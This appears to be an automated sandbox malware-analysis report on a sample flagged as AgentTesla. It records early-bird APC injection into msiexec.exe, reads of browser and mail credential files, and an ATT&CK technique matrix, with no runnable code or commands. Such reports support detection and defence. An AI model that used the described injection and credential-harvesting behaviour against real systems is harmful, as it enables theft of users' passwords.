Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 12_2_0279F0BE LdrInitializeThunk,

12_2_0279F0BE

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EBC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_00405BB3 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405BB3

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2422375489.000000002208D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2422375489.0000000022061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2422375489.00000000220B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7948, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 0000000C.00000002.2422375489.0000000022061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7948, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2422375489.000000002208D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2422375489.0000000022061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2422375489.00000000220B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7948, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	421 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
doc20250319-00712.bat.exe	40%	Virustotal		Browse
